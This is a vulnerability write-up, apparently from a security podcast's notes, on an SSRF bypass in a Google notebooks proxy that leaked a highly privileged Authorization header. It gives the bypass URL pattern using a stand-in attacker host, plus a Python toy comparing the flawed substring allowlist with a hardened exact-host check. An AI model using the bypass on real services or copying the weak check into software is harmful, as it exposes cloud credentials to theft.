Insufficient Domain Validation Resulting in SSRF Disclosing Authorization Header to Attacker

We discussed this vulnerability during Episode 183 on 30 January 2023

The service had a proxy. You would go through the OAuth flow to get access to Google data; the service then had an endpoint that would proxy requests to the Google backend, adding the Authorization header to them. It had some whitelisting so it should only proxy to Google APIs, but with https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ that check could be bypassed by placing the compute URL after the attacker URL.

Getting the SSRF to hit the attacker page would disclose the Authorization header, which had the Cloud-Platform permission, so it was highly privileged. Since this is a GET request with no CSRF protection, the only requirement is knowing the instance ID.
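The bypass above comes down to where the proxy looks for the allowed domain. The following is an added example, not code from the episode or from Google's proxy: it models the weak check as a substring match over the whole proxied path (an assumption about the original logic, chosen because it reproduces the described bypass) and places it beside a hardened check that takes exactly one hostname from the first path segment and compares it against an allowlist. The allowlist contents, `ALLOWED_HOSTS`, and the `attacker.example` host are constructed for the example.

```python
"""Toy model of the proxy target check discussed in Episode 183.

Added example (not the original service's code). The vulnerable check is an
assumption about how the original validated targets; the hardened check shows
the defensive pattern: validate the one host the request will actually go to.
"""
from urllib.parse import urlsplit

# Constructed allowlist of Google API hosts the proxy is meant to reach.
ALLOWED_HOSTS = {"compute.googleapis.com", "storage.googleapis.com"}


def resolve_target(proxy_path: str) -> str:
    """Where the proxied request really goes: the first path segment is the host.

    '/aipn/v2/proxy/<proxy_path>' is forwarded to 'https://<first segment>/<rest>'.
    """
    host, _, rest = proxy_path.partition("/")
    return f"https://{host}/{rest}"


def vulnerable_allowed(proxy_path: str) -> bool:
    """Weak check (assumed): accept if any allowlisted host appears anywhere.

    'attacker.example/compute.googleapis.com/' passes because the Google host
    appears later in the string, yet resolve_target() sends the request, with
    the Authorization header attached, to attacker.example.
    """
    return any(host in proxy_path for host in ALLOWED_HOSTS)


def hardened_allowed(proxy_path: str) -> bool:
    """Strict check: only the host the request will reach is examined, exactly."""
    host, _, _ = proxy_path.partition("/")
    host = host.lower()
    # Refuse empty hosts and any separator (userinfo, port, backslash, query,
    # fragment, percent-encoding) that could make a downstream URL parser pick
    # a different host than the one validated here.
    if not host or any(c in host for c in "@:\\?#%"):
        return False
    # Defence in depth: the rebuilt URL must parse back to the same host.
    if urlsplit(f"https://{host}/").hostname != host:
        return False
    # Exact match, not suffix or substring, so 'compute.googleapis.com.attacker.example'
    # and 'compute.googleapis.com@attacker.example' are both rejected.
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    for path in (
        "compute.googleapis.com/compute/v1/projects",
        "attacker.example/compute.googleapis.com/",
        "compute.googleapis.com.attacker.example/",
    ):
        print(f"{path!r:55} -> {resolve_target(path)}")
        print(f"    vulnerable={vulnerable_allowed(path)}  hardened={hardened_allowed(path)}")
```

The lesson is that the allowlist must be applied to the same value the HTTP client will connect to, after the same parsing, rather than to a loose pattern over the raw string; the CSRF point in the write-up is a separate fix (the endpoint should not be a side-effecting GET reachable from a third-party page).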